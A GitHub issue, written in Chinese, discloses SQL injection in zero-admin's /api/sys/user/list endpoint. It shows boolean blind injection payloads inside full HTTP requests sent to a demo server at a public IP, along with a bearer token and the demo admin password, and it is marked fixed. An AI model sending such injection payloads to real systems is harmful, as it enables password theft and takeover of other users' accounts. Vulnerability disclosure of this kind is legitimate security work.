Closed L1nyz-tel closed 2 months ago
此处代码对应的路由是 /api/sys/user/list
/api/sys/user/list
https://github.com/feihua/zero-admin/blob/744dccf7c6bbe28ba78d429d85bbb1908edec746/rpc/model/sysmodel/sysusermodel.go#L61-L84
那就可以使用布尔盲注挨个匹配出其他账号的密码明文
已知 demo 网站 admin 密码是 123456 此处做一个简单的注入判断
sys_user.username like '%admin' AND sys_user.passsword like '124%' 无匹配
sys_user.username like '%admin' AND sys_user.passsword like '124%'
POST http://110.41.179.89/api/sys/user/list HTTP/1.1 Host: 110.41.179.89 Content-Length: 75 Accept: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://110.41.179.89 Referer: http://110.41.179.89/mall/system/user/list/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}
sys_user.username like '%admin' AND sys_user.passsword like '123456%' 匹配成功
sys_user.username like '%admin' AND sys_user.passsword like '123456%'
POST http://110.41.179.89/api/sys/user/list HTTP/1.1 Host: 110.41.179.89 Content-Length: 78 Accept: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://110.41.179.89 Referer: http://110.41.179.89/mall/system/user/list/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}
已修复
sql 注入获取其他账号密码
此处代码对应的路由是
/api/sys/user/list
https://github.com/feihua/zero-admin/blob/744dccf7c6bbe28ba78d429d85bbb1908edec746/rpc/model/sysmodel/sysusermodel.go#L61-L84
那就可以使用布尔盲注挨个匹配出其他账号的密码明文
已知 demo 网站 admin 密码是 123456
此处做一个简单的注入判断
sys_user.username like '%admin' AND sys_user.passsword like '124%'
无匹配sys_user.username like '%admin' AND sys_user.passsword like '123456%'
匹配成功